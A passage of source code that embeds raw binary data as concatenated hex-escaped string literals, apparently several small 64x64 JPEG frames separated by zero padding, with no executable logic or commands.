+"\xa9\xfc\xb7\x8a\x20\xb6\xf8\xe3\xa2\xb9\x38\xc7\xa6\x7b\x52\x5d"
+"\x5a\xc5\x75\x1e\xc9\x57\x38\xe5\x58\x70\x54\xfa\x83\x55\x45\xcc"
+"\xd6\x0c\x12\xfd\xb7\xc3\xd1\x6e\x3a\x63\xfd\xef\x4f\xaf\x4a\x2d"
+"\x7d\xbe\xe0\xbf\x2f\xc5\xf7\x97\x7c\xd5\x12\x88\xc9\xc3\x11\x90"
+"\x31\xd6\x9f\x47\x04\x67\xa8\xa8\x84\x6d\x14\x6d\xe4\xe5\x8e\x72"
+"\x15\xda\xa4\xb2\x5a\x06\x54\x61\x18\xa7\x18\x18\xed\xf8\x53\x04"
+"\xaa\x19\x51\xc8\x57\x61\x9d\xa4\xd3\xe9\x06\xe4\x17\xd6\xff\x00"
+"\x6a\xb5\x68\xc1\xda\xe3\xe6\x46\xfe\xeb\x0e\x86\x92\xc6\xe3\xed"
+"\x56\xab\x21\x1b\x5c\x7c\xae\xbf\xdd\x61\xd4\x55\x8a\xa6\x22\x92"
+"\xdf\x53\xdf\x1a\x13\x0d\xc0\xf9\xf1\xfc\x2c\x3a\x1f\xc4\x71\x54"
+"\xb5\x56\x25\xe8\xee\x5c\xa4\x65\x0c\xa5\x58\x02\x0f\x50\x69\x68"
+"\x00\x96\x55\x1d\xce\x2a\x4a\x33\xcc\x13\x69\xe7\x75\x92\xf9\x96"
+"\xfd\xed\xfb\xaf\xfb\xbf\xe1\x56\xed\xae\x62\xba\x8b\xcc\x85\xb7"
+"\x0e\x84\x77\x07\xd0\x8e\xd5\x2d\xc3\x25\xb2\xab\x4f\x2a\x20\x66"
+"\xc0\xcf\x53\xf4\xf7\xac\xc9\x1a\xcc\xdc\x2d\xcc\x37\x3e\x4c\xbc"
+"\x6f\x2a\x87\x0e\x3d\x08\xc7\x3f\xd2\x9c\xa7\x1d\xa6\xec\xc9\x51"
+"\x6b\xe1\x5a\x1a\x64\x03\xd4\x03\x8a\x88\x23\xc6\x1c\xa3\x19\x33"
+"\xc8\x56\x3d\x3f\x1a\x8f\xed\xf6\xd8\xff\x00\x5c\x3a\x7f\x75\xba"
+"\xfe\x55\x35\xbc\xb1\xdc\xb3\x2c\x12\xab\x15\x00\xe0\x82\x2a\x14"
+"\xe2\xdd\x93\x45\xb8\xbd\xda\x00\xff\xd9\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00"
+"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03"
+"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x3f\x22\x3d\x36\x68\xd9"
+"\x6e\xe4\x8e\xdc\xe4\x18\xe4\x6d\xca\x38\xec\x4f\x22\xaf\xc5\x2c"
+"\x73\x26\xf8\x9d\x5d\x7d\x54\xe6\xa9\x6a\xfa\x7b\xea\x11\x47\x1a"
+"\xc8\x23\x0a\x72\x49\x19\x35\x66\xd6\xd8\x5b\x23\x8d\xe5\xd9\xdb"
+"\x73\x31\xe3\x26\x9b\x6d\xee\x24\x92\xd8\x9e\xa2\xfb\x3c\x41\xa4"
+"\x64\x40\x8f\x27\xde\x64\xe0\x9f\xc6\xa5\xa2\x90\xc6\x46\xa5\x13"
+"\x6b\x3b\x39\xfe\xf3\x63\x3f\xa5\x3e\xa3\x95\x19\xc0\x09\x2b\x47"
+"\xee\x00\xa5\x8d\x4a\xae\x19\xcb\x9c\xf5\x34\x00\xfa\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x2a\x89\xdc\x67\x20\x30\xe3\x1d\xa9\xd2\xcd\xbe\x17\x58\x9b\x64"
+"\x84\x10\xbb\xbd\x6a\x1a\x29\x5c\x6d\x14\xc3\xdc\x43\x70\x24\x66"
+"\x78\xe3\x2b\xb0\x3c\xc7\x78\x07\xa9\xe9\xeb\x81\xf9\x55\x88\x75"
+"\x46\x6d\xa2\x4b\x67\xe4\xed\xca\xf3\x96\xc6\x4f\x15\x20\xca\xfd"
+"\xd2\x47\x18\xe2\x91\xc0\x75\x60\xe8\x0e\x54\xa8\x20\xed\x3c\xf5"
+"\x39\xad\x39\xd3\xdd\x19\xf2\x49\x6c\xcb\x11\x5e\x5b\x4a\x01\x8e"
+"\x64\x6c\xae\xe0\x33\xce\x2a\x65\x60\xca\x19\x4e\x41\xe4\x56\x4c"
+"\xd6\x62\x43\xb6\x29\x55\x10\x39\x2a\xa5\x30\x72\x7d\x0f\xe7\x4d"
+"\x90\xde\x59\x2a\x98\xdc\xba\xb0\x01\xdd\x8e\xe0\x0e\x49\xe3\xf9"
+"\x51\xca\x9e\xcc\x5c\xcd\x6e\x8d\x9a\x2b\x3a\x5b\xe9\xa1\xb0\x86"
+"\x57\x8c\x79\x8e\x79\x1e\x83\xa9\x3f\x95\x5e\x8d\xfc\xc8\xd5\xc0"
+"\x61\x91\x9c\x30\xc1\xa9\x69\xa2\xd4\x93\x28\xac\x80\x85\xde\x3c"
+"\xb6\x6f\xe1\x62\x33\x4f\xa4\x92\x30\x58\xac\x8a\x0e\xd3\xc6\x7f"
+"\x9d\x28\xe2\xa0\xb4\x14\x51\x45\x03\x0a\x06\x57\xee\x92\x31\xe9"
+"\x45\x14\x08\x24\xc4\x8a\x04\xa8\xb2\x60\x71\x9e\x0d\x5a\x49\x91"
+"\xdb\x6f\x43\xd8\x1e\xf5\x56\xab\xde\x9c\x22\x73\x8e\x69\xdc\x4d"
+"\x58\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff"
+"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11"
+"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00"
+"\x3f\x00\xf4\xeb\xaf\xe0\xe3\xd7\xbd\x41\x52\xde\x0c\x85\x1c\x67"
+"\x9e\x4f\x5a\xca\x6b\x18\xd0\x05\x92\xe3\x1c\x63\xd3\x35\x13\x6d"
+"\x6c\x8d\x21\x14\xf7\x66\x85\x15\x4a\x0b\x68\xa2\x9b\xcc\x17\x19"
+"\xc8\x2a\x06\xea\x8a\x48\x20\x8a\x20\xef\x31\x21\x0e\x3e\x45\x24"
+"\xe4\x91\xd8\x75\x3c\x54\xa9\x49\xec\x8b\x71\x8a\xdd\xfe\x05\xf9"
+"\xa4\xf2\x93\x76\x01\xe7\x1c\x9c\x53\x90\x92\xb9\x65\xda\x7d\x33"
+"\x9a\xc9\x8c\xdb\xb7\xee\x37\xcc\xab\x29\x50\x37\xc2\x54\x64\x74"
+"\xeb\xf4\xad\x28\xe1\x31\x46\xa8\x24\x38\x5e\x3b\x53\xf7\x96\xe8"
+"\x97\xc9\x6f\x75\xdc\xa7\xad\x67\x16\xd9\x2d\x8d\xad\xd7\xf0\xac"
+"\x29\x6e\x9d\x26\x68\xd2\x30\xc4\x60\x00\x5b\x19\xcf\xe1\xd2\xba"
+"\x6b\xed\x36\x6b\x98\x62\x68\xdf\xe7\x40\x46\xd9\x3b\xfe\x35\x9e"
+"\xfa\x65\xd2\xac\x8f\xfb\xa2\x23\xfb\xd8\x6e\x9c\x66\xbc\xac\x5e"
+"\x1a\xad\x4a\xce\x51\x8d\xd1\xd5\x42\xb4\x21\x4f\x95\xbb\x1b\xb7"
+"\x87\x01\x71\x82\x79\xc0\xee\x6b\x31\xbc\xc9\xc1\x33\xd9\xe4\xaf"
+"\xdd\xc9\xf7\xad\x5b\xaf\xe0\xe4\xf7\xed\x50\x57\xad\x28\xdc\xe4"
+"\x84\xb9\x4c\xe3\x1e\x79\xfb\x00\xe3\xde\x92\xe5\x4c\x31\x33\xa5"
+"\x27\x39\xfa\x1a\xb6\x24\x94\xb3\x0f\xb3\x90\x00\x38\x3b\xc7\x35"
+"\x2d\x28\xe4\xe0\x52\x8c\x1a\x56\x4f\xf2\x14\xe7\xcc\xdb\x68\x6d"
+"\xa3\xdd\xfd\x99\x84\xf0\x64\x97\x3b\x70\xc0\x61\x09\x38\xfc\x86"
+"\x3e\xb5\xcb\xda\xec\x10\x88\xe3\xdc\x04\x64\xc6\x43\xfd\xe0\x47"
+"\x18\x3e\xf5\xd8\xdb\x44\xf0\xc4\x56\x49\x5a\x42\x58\xb0\x24\x74"
+"\x04\xe7\x1f\x87\x4a\x82\xf7\x4a\xb2\xbd\x1f\xbf\x88\x83\x9c\xee"
+"\x8d\x8a\x12\x7d\xc8\x23\x35\x96\x27\x0d\xed\xe2\xa3\xcc\x14\x6b"
+"\x7b\x37\x7b\x1c\xd5\x15\xb5\x36\x93\xa5\x25\xdd\xb2\x48\xb2\xf9"
+"\xaf\x91\x1a\x89\x1b\x9d\xa3\x24\x90\x0e\x3f\x13\xea\x29\x9a\x86"
+"\x8f\x65\x6b\x65\x79\x79\x12\x48\x25\x48\x5d\x86\x65\x62\x32\x01"
+"\x3d\x33\x8a\xe0\xfe\xca\x97\xf3\x1d\x4f\x1d\x1e\xc6\x82\x6c\xf2"
+"\xfd\xeb\x17\xfe\x67\x18\xbf\xeb\xc9\xff\x00\xf4\x31\x5c\xcb\x6a"
+"\x3e\x22\x59\xb6\x2d\xfc\x4d\x18\x20\x19\x07\x97\xfc\xba\xd6\xfe"
+"\x85\x01\x37\x82\xee\xf7\x55\x8a\xf2\xed\xa2\x31\xa4\x68\x02\xed"
+"\x5c\xe4\xf4\xeb\xd2\xbe\x89\xd1\x74\x93\x6d\xa3\xc6\x55\x95\x56"
+"\x92\x4f\x73\x7a\x88\x23\xb7\xbd\x1b\x98\x79\x82\x19\x78\xc8\x20"
+"\x07\x5e\xfe\xf8\xa4\x22\x52\xf1\x88\xa2\xde\x0b\x80\xe7\x76\x36"
+"\xaf\xaf\xbf\xd2\xaf\x74\xae\x75\xa6\xa7\x4b\xd7\x41\x68\xa2\xa8"
+"\x6a\x4b\x35\xcc\x90\xd9\x44\x24\x58\xe5\x3b\xa6\x95\x78\xda\x83"
+"\x1f\x2e\x7d\x58\xe0\x7d\x33\x4d\x2b\xb1\x37\x64\x4b\x15\x9e\xdd"
+"\x46\x6b\xc9\x1f\x7b\xba\x88\xe3\x18\xc7\x96\x83\x92\x07\xd4\xf2"
+"\x7f\x0f\x4a\x6e\xb3\xff\x00\x20\x4b\xef\xfa\xf7\x93\xff\x00\x41"
+"\x35\x72\xa9\xeb\x3f\xf2\x04\xbe\xff\x00\xaf\x79\x3f\xf4\x13\x4e"
+"\x2e\xf2\x44\xc9\x5a\x2c\xcd\xfe\xc6\xb6\xff\x00\x9e\xd7\x7f\xf8"
+"\x10\xd5\x2d\xae\x99\x6d\x6d\x71\xe7\x47\xe6\xbc\xbb\x4a\x06\x92"
+"\x42\xf8\x07\x19\xc6\x7e\x82\xad\xd2\xdb\xc7\x6f\x76\x12\x62\x37"
+"\xf9\x52\x1d\x84\xe4\x61\x86\x54\x9f\x7e\xf4\xb9\xa4\xfa\x95\xcb"
+"\x15\xb2\x27\xb6\x89\xe1\x46\x12\x4b\xe6\x12\xc4\xe7\x6e\x30\x3b"
+"\x0f\xc2\xa6\xa2\x8a\x43\x21\xba\xb8\x8e\xd2\xd6\x4b\x89\x89\x11"
+"\xc6\xbb\x8e\x39\x3f\x85\x16\x8f\x34\x96\xb1\xbd\xcc\x62\x39\x59"
+"\x72\xc8\x0e\x76\xfb\x53\x1b\xec\xb7\xac\xf0\xb6\xd9\x4c\x12\x29"
+"\x65\xfe\xeb\x0c\x11\x9f\xd0\xd5\x9a\x7d\x05\xbb\xb8\x55\x3d\x67"
+"\xfe\x40\x97\xdf\xf5\xef\x27\xfe\x82\x6a\xe5\x53\xd6\x7f\xe4\x09"
+"\x7d\xff\x00\x5e\xf2\x7f\xe8\x26\x9c\x7e\x24\x29\x7c\x2c\xff\xd9"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0"
+"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11"
+"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xe8"
+"\xe8\xac\x38\x2d\x1c\xea\xa9\x13\xc0\xe2\xd6\x29\x65\x28\xbb\x48"
+"\x41\xc2\x11\xc7\x4c\x64\xb6\x3d\xfa\x74\xa9\xf4\x14\x31\x2c\xf1"
+"\x88\x9f\x60\x20\x89\x9e\x36\x46\x93\x8e\x77\x03\xd5\x87\x73\xd0"
+"\xe6\xbe\x56\x54\x92\x8d\xd3\x3d\xb8\xd4\x6d\xda\xc6\xad\x6d\x78"
+"\x69\x92\x3f\x0e\x44\x62\x67\x9a\x38\xc3\x6d\xc2\xf2\x70\x4f\x00"
+"\x7d\x72\x2b\x16\xb6\xbc\x36\xe3\xfe\x11\xe4\x92\x08\x0a\x8f\x9c"
+"\xac\x59\xee\x09\xe3\x9f\x5f\xeb\x5e\x8e\x55\xf6\xfe\x5f\xa9\xc7"
+"\x8e\xfb\x3f\x3f\xd0\xb2\x8d\xbd\x15\xf0\x57\x70\x07\x0d\xd4\x7d"
+"\x69\x69\x11\x8b\x46\xac\xca\x51\x88\x04\xa9\xea\x0f\xa5\x2d\x7a"
+"\xe7\x12\x0a\x28\xa2\x81\x9c\xdd\x15\xa3\xa2\xe8\xf6\x57\x7a\x0d"
+"\xb4\xb3\x2c\xa5\xa7\x8d\x5d\xf1\x33\xf5\xc7\x6e\x78\xa9\x7f\xb2"
+"\x74\xa9\x6e\x8d\x83\x47\x3a\xbc\x48\x1d\x7f\x7c\xc3\x72\x9e\xe0"
+"\x83\x93\x82\x39\xcf\x4e\x3d\x6b\xc8\x79\x4c\x93\x6b\x9b\xf0\x3b"
+"\x16\x3d\x34\x9f\x2e\xe6\x49\x38\x19\x35\xb7\xe1\xd6\xb8\x3e\x1f"
+"\x8e\x49\x13\x33\x30\x66\x0a\x46\xdc\xfa\x7d\x3b\x54\xbf\xd8\x5a"
+"\x7f\xda\x56\xe0\xc6\xe6\x45\xe4\x7e\xf1\xb0\x3f\x0c\xe2\xaf\xb2"
+"\xb2\xc2\x56\x00\xa1\x82\x9d\x99\xe9\x9e\xd9\xae\xcc\x26\x17\xea"
+"\xf7\xbb\xbb\x76\x30\xaf\x5b\xda\xda\xda\x58\xa6\x85\x8a\x29\x75"
+"\x0a\xc4\x0d\xc0\x1c\x80\x7b\xd2\xd5\x6b\x99\xe6\x89\x60\x8d\x16"
+"\x36\xb8\x99\xb6\x73\x9d\xa0\x80\x4b\x1f\x5e\xc7\x8a\x8e\x3b\xff"
+"\x00\x2e\xe9\xac\xee\xb6\xb5\xc0\xda\x54\x42\xa4\xee\x53\x9e\x71"
+"\xdb\x18\x39\xed\x5d\xbc\xad\xea\x73\xf3\xa5\xa3\x2e\xd1\x45\x15"
+"\x25\x91\x78\x6b\xfe\x45\xbd\x3f\xfe\xb8\x2f\xf2\xab\x77\x16\x89"
+"\x3d\xcd\xbd\xc6\xe6\x49\x20\x62\x55\x97\xb8\x23\x05\x4f\xb1\xe3"
+"\xf2\x15\x53\xc3\x5f\xf2\x2d\xe9\xff\x00\xf5\xc1\x7f\x95\x69\xd6"
+"\xb3\x76\x9b\x30\x82\xbc\x10\x80\x82\x32\x0e\x47\xb5\x2d\x50\xb1"
+"\xb7\x96\xce\xee\xe2\x15\x5c\xda\x39\xf3\x62\x39\xfb\x8c\x4f\xcc"
+"\xbf\x4c\xf2\x3e\xa7\xd2\xaf\xd4\xb5\x62\xd3\xba\x33\xae\xec\x95"
+"\xe2\x75\x9a\x66\x60\xf2\x6e\x8c\x9c\x06\x8c\xf6\xda\x7d\x8e\x71"
+"\x59\x50\xc4\xd0\xb5\xf1\x8a\xf0\x40\x60\x23\x73\x48\x03\xb4\x87"
+"\x68\x3b\x9c\x9e\x70\x7a\x00\x31\xd2\xba\x29\xa0\x8a\x74\x09\x34"
+"\x6b\x22\x86\x0c\x03\x0c\xe0\x83\x90\x6b\x2e\xf2\xd6\x3b\xb9\x64"
+"\x0b\x12\x2c\xf1\x30\x51\x34\xb0\xee\x20\x70\x72\xb9\xeb\xfc\xb3"
+"\x55\x19\x74\x22\x51\xbe\xa8\x9a\xde\x43\x35\xb4\x52\xb2\x14\x32"
+"\x22\xb1\x53\xdb\x23\x38\xa9\x2b\x1a\x19\x12\xd2\xe5\xee\x2d\x56"
+"\xe2\x5b\x30\xac\x6e\x67\x76\xdd\xbd\x86\x3e\x61\x9e\x4e\x39\xc9"
+"\x1c\x7a\x56\xcd\x4c\xe3\x66\x5c\x25\xcc\x88\xbc\x35\xff\x00\x22"
+"\xde\x9f\xff\x00\x5c\x17\xf9\x56\x9d\x66\x78\x6b\xfe\x45\xbd\x3f"
+"\xfe\xb8\x2f\xf2\xad\x3a\xaa\x9f\x13\x26\x9f\xc0\x88\xae\x44\xc6"
+"\xda\x41\x6c\xca\xb3\x6d\x3b\x0b\x8c\x8c\xf6\xcd\x47\xa7\xdd\xad"
+"\xed\x9a\x4e\x14\xa3\x1c\xab\xa1\xea\x8c\x0e\x19\x4f\xd0\xe6\xac"
+"\xd5\x79\x66\xb7\xb3\x64\xdc\xa2\x3f\xb4\x4a\x17\x70\x5e\x0b\x91"
+"\xc6\x7e\xb8\xc6\x7e\x95\x2b\x55\x61\xbd\x1d\xcb\x15\x0d\xda\xca"
+"\xd0\x1f\x21\x51\xa4\x04\x60\x39\x20\x63\x3c\xf2\x3d\xb3\x53\x51"
+"\x48\xa3\x07\x58\x89\xdd\xa2\x0d\x29\xf2\xda\x45\x8c\x46\xc3\xe4"
+"\x0c\x4f\xde\x6f\xef\x74\xe0\x74\xcf\xad\x3e\xde\x79\x23\xd4\x1e"
+"\xca\xe6\x71\x3b\xf9\x62\x55\x60\x9b\x48\x19\x20\x86\xc7\x1f\x43"
+"\x57\x6e\xed\xa3\x02\x79\x67\x97\x74\x52\x00\x19\x24\x23\x6a\xf6"
+"\xe3\x3e\xbc\x56\x37\xf6\x7c\xf0\xcd\xf6\x7b\x34\x0a\x8a\x43\x23"
+"\x36\x76\x03\xfd\xe7\x3d\x64\x6f\x6e\x82\xb4\x8d\x9a\xb3\x32\x95"
+"\xd4\xb9\x90\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
+"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
+"\x11\x00\x3f\x00\xf4\x7a\x28\xa2\xa4\xb2\x2b\x6b\x88\xee\x91\xda"
+"\x12\x58\x47\x23\x44\xd9\x18\xc3\x29\xc1\xfd\x45\x4d\x83\xe9\x5c"
+"\xc5\xbe\x92\x04\x96\xd0\x1b\x36\x4b\x73\xa9\xdd\x49\x2a\x05\x21"
+"\x59\x30\xfb\x37\x7f\xb2\x7e\x5f\x63\x4b\x0e\x9a\xf0\x42\xb3\x45"
+"\x04\xa2\x78\xf5\x50\x23\x6e\x72\x90\x79\x98\xc0\xf4\x4d\xa4\xfb"
+"\x77\xa0\x9b\x9d\x2d\x14\x51\x41\x41\x45\x14\x50\x01\x45\x14\x50"
+"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50"
+"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x03\x63\x91\x25"
+"\x89\x64\x89\x83\xa3\x8c\xab\x0e\x84\x53\xaa\x0b\x29\xcc\xf0\xb6"
+"\xf0\x37\xc6\xe6\x37\x2a\x72\x09\x1d\x48\xa9\xe9\xb5\x67\x61\x27"
+"\x75\x70\xa2\x8a\x29\x0c\x28\xa2\x8a\x00\x28\xa2\x8a\x00\xff\xd9"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0"
+"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11"
+"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4"
+"\x7a\x28\xa5\x1d\x46\x7a\x54\x96\x18\x3e\x94\x62\xb9\x17\xb6\x1f"
+"\x61\x85\x5e\xca\xed\xb5\x91\x73\x19\x9a\x65\x8d\xbe\x6f\xde\x0d"
+"\xcc\x5c\x70\x63\x2a\x38\x1f\xa0\xc1\xa7\xc9\x6a\x31\xa8\xc0\x56"
+"\x7f\x28\xca\xb3\x7d\xa5\xed\x64\x62\xcd\xe6\x13\xe5\xc8\xbf\xf2"
+"\xd1\x47\xa8\xfe\x12\x07\x6a\x09\xb9\xd5\xe2\x92\xb9\xa4\x8e\x26"
+"\x28\xda\xde\x99\x70\x63\x6b\x58\xc4\x10\xa4\x6f\x28\x84\xe0\xef"
+"\x41\x8e\x43\xe7\x1c\x9e\x71\x8e\x78\x35\xb7\xa4\xa5\xcc\x7a\x4d"
+"\xaa\x5f\x12\x6e\x56\x30\x24\xdc\x72\x73\xee\x7b\x9c\x63\x27\xd6"
+"\x81\xdc\xb5\x52\x5b\x34\x9e\x73\xa1\x8c\x08\x82\x82\x1f\x77\x53"
+"\xce\x46\x3f\x2f\xce\xa3\xa9\x2d\x7c\xdf\x3a\x4c\xec\xf2\x70\x36"
+"\xe3\x3b\xb7\x73\x9c\xfb\x74\xa6\x84\xc8\xe8\xa2\x8a\x45\x05\x14"
+"\x51\x40\x05\x14\x56\x4c\xb7\xf7\x66\x49\xa0\x11\x15\x92\x19\x43"
+"\xb8\x51\xcb\xc3\x9e\xa9\x9f\xbc\x71\xd7\xeb\x8e\xb8\xaa\x8c\x5c"
+"\xb6\x22\x52\x51\xdc\xd6\xa9\x6d\x56\x5f\x36\x46\x2e\xa6\x22\x00"
+"\x54\xdb\xc8\x3c\xe4\xe7\xf2\xfc\xaa\x08\xa5\x8e\x78\x96\x58\x5c"
+"\x3c\x6e\x32\xac\x3a\x11\x53\xda\xc6\xe2\x49\x24\x32\x31\x46\x00"
+"\x2a\x10\x30\xb8\xce\x48\xfa\xe7\xf4\xa4\x86\xf5\x22\xa2\x8a\x29"
+"\x14\x14\x51\x54\xae\xb5\x14\x8c\x94\x80\x86\x91\x5c\x29\x2c\x8d"
+"\xe5\x93\x9f\xbb\xbf\x18\x0d\xdb\xeb\x4d\x26\xf6\x26\x52\x51\xd5"
+"\x89\xa8\x5f\xc7\x6f\x04\x81\x25\x09\x28\x1b\x90\xb0\xf9\x5b\x1d"
+"\x57\x77\x4c\xf0\x45\x49\x2a\x2d\xe1\xb7\x91\x54\x18\xb1\xe6\xac"
+"\xaa\xf8\x64\x3c\x63\x1e\xc4\x13\x9a\x86\xd0\x89\x2f\xdd\xed\xe1"
+"\x9a\x28\x24\x42\x67\x49\x53\x68\xf3\x32\x31\x80\x7b\xe3\x39\xc7"
+"\x1d\x2a\xfa\xc0\xed\x12\xad\xb3\x24\x4a\xac\x07\xdd\xc8\x00\x1e"
+"\x40\x1d\xbd\x3d\xaa\xdd\x95\x92\x33\x57\x95\xdb\xd8\x58\x02\xc9"
+"\x3b\xc3\xe5\xba\xaa\xa8\x25\xb6\xe1\x4e\x73\xc0\x3e\xbe\xb5\x6a"
+"\x08\x63\xb7\x81\x21\x81\x02\x46\x83\x6a\xa8\xe8\x05\x3f\xa5\x2d"
+"\x49\x65\x1a\x28\xaa\x57\xba\x83\x5b\x48\xd1\xc3\x07\x9c\xea\x01"
+"\x23\x7e\xdc\x96\xce\xd5\x1c\x1c\x93\x83\xf4\xa4\x93\x93\xb2\x1c"
+"\xa4\xa2\xae\xc5\xba\xb8\xba\x6b\x86\xb6\xd3\xd2\x23\x32\x2a\xbb"
+"\x34\xa4\x85\x19\x3c\x0e\x39\xc9\xc1\xfa\x55\x2b\x45\x96\xfa\xca"
+"\x4b\x58\xda\x25\xb7\x32\x30\x94\x36\x7c\xc8\xf2\xd9\x65\xc7\x43"
+"\xce\x70\xde\x95\x7a\x48\x52\xec\x0b\x9b\x79\x5e\x39\x36\x94\xdd"
+"\x1b\xe3\x38\x27\xe5\x3c\x1e\x87\x3c\xfd\x68\xb0\xb0\x95\x60\x98"
+"\x47\x34\x51\xca\xc0\x26\x50\x6e\x58\x80\x1c\x0c\x1e\x49\xe4\x9c"
+"\x9e\xb9\xad\x53\x49\x69\xb9\x8b\x4d\xca\xef\x62\xe2\x16\x7b\xa5"
+"\x8c\xc7\x26\xd2\xa5\x8c\x9f\xc2\x39\xe9\xf5\xff\x00\x0a\xb3\x04"
+"\x11\x5b\xc7\xe5\xc1\x1a\xc6\x99\x27\x0a\x3b\x93\x92\x7f\x3a\x78"
+"\x18\x00\x0e\xd4\xb5\x99\xa8\x51\x45\x54\xd4\x2f\x56\xca\x15\xc2"
+"\x19\x67\x90\xec\x86\x15\xeb\x23\x7a\x7b\x0e\xe4\xf6\x14\xd2\xbe"
+"\x88\x4d\xa4\xae\xc0\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01"
+"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02"
+"\x11\x03\x11\x00\x3f\x00\xf5\x5a\xe3\x9c\xca\x67\x98\xce\x00\x93"
+"\xcd\x7c\x80\x3f\xda\x38\xfd\x31\x5d\x8d\x71\xa5\x4a\x4d\x32\xb4"
+"\x82\x43\xe7\x49\xf3\x03\x9f\xe2\x35\xe6\xe6\x7f\xc1\x5e\xbf\xa3"
+"\x3a\xf0\x7f\xc4\xf9\x7f\x90\x51\x59\x77\xd1\xc6\xda\x96\xeb\xd8"
+"\x5e\xe2\xdc\x44\x04\x68\xa8\x5c\x2b\xe4\xe4\x95\x1d\xc8\xdb\x83"
+"\xdb\x07\xa7\x7a\x16\x48\x1a\xd6\xd4\xdf\xc1\x3c\xb6\xcb\xe7\x00"
+"\x8c\x0c\xbb\x5b\xcc\x38\xdc\x06\x73\xc7\x00\xf3\x8e\x7d\x6b\xc8"
+"\x8d\x1b\xc6\xf7\xfe\xb5\x3b\xdd\x4b\x3b\x58\xe8\xe8\xac\x4b\x56"
+"\x9a\xce\x68\x27\xb8\x5b\xaf\xb3\xb2\xca\x8a\x0a\xb3\x94\x05\xc1"
+"\x4d\xc0\x64\xf4\xe9\x9e\x9d\x0d\x33\xec\xfa\x8c\x56\xb6\xf3\x5a"
+"\xab\x89\xa6\x0d\x14\x81\x8f\x31\xab\x31\x65\x72\x3d\x54\x1e\x9e"
+"\xf4\x7b\x05\xdf\xfa\xd4\x3d\xa7\x91\xbd\x5a\xfe\x15\xd8\x2c\xee"
+"\x16\x37\x2c\x3c\xf6\x27\x23\x18\x27\xa8\xac\x58\x62\x48\x20\x48"
+"\x63\x04\x22\x28\x51\x9f\x41\x5b\x3e\x15\x74\x7b\x5b\x9d\x91\xec"
+"\xc4\xec\x0f\x39\xc9\xf5\xae\xec\xaf\xe3\x95\xbb\x7e\xa7\x36\x37"
+"\xe1\x89\xb9\x5c\x6b\x88\xe3\xbb\xba\x86\x32\xd9\x8e\x67\xc8\x6e"
+"\xa3\x24\x9f\xcb\x9e\x2b\xb2\xaa\xb7\xba\x75\xa5\xf2\x15\xb8\x8b"
+"\x24\xe3\xe6\x52\x55\xb8\xf7\x1c\xd7\xa7\x89\xa1\xed\xe9\xf2\x5e"
+"\xda\x9c\x74\x6a\x7b\x29\x73\x58\xe4\xa7\xb5\xb7\xb8\x60\xd3\x44"
+"\xae\x40\x2b\x92\x39\xc1\xea\x3e\x95\x22\x22\xc6\x8a\x91\xa8\x55"
+"\x51\x80\xaa\x30\x00\xad\xe7\xf0\xfe\x9c\xd1\xa2\xb2\x4a\x16\x3e"
+"\x98\x99\x87\xe6\x73\xcf\xe3\x48\x9a\x3e\x95\x31\x5b\xd4\x2c\xca"
+"\x46\xe0\xeb\x33\x6c\x23\xd7\x19\xc6\x2b\xce\xfe\xcc\x9b\x56\xe7"
+"\x3a\xbe\xb9\x1b\xfc\x26\x1d\x15\xb6\xba\x26\x94\x8e\x62\x05\xc3"
+"\xcc\xa4\xed\x33\xb6\x48\xf5\x1c\xff\x00\x2a\x51\xa0\xe9\x6f\x19"
+"\x81\x44\x84\x23\x64\x81\x3b\x6e\x07\x1d\xce\x73\xd0\xf4\xa5\xfd"
+"\x95\x2f\xe6\xfc\x07\xf5\xe5\xd8\xc3\xad\x2f\x0f\x8b\xbb\x9d\x3e"
+"\x47\x8e\xe3\xc9\x1e\x73\x05\x26\x3c\xe5\x7b\x70\x6a\xe3\x78\x7f"
+"\x4e\x67\x8d\xda\x27\x26\x3c\x6d\x06\x46\xc7\x1d\x32\x33\xcf\xe3"
+"\x5a\x31\xc6\xb1\xa0\x44\x18\x51\x5d\x78\x5c\x12\xa1\x76\xdd\xee"
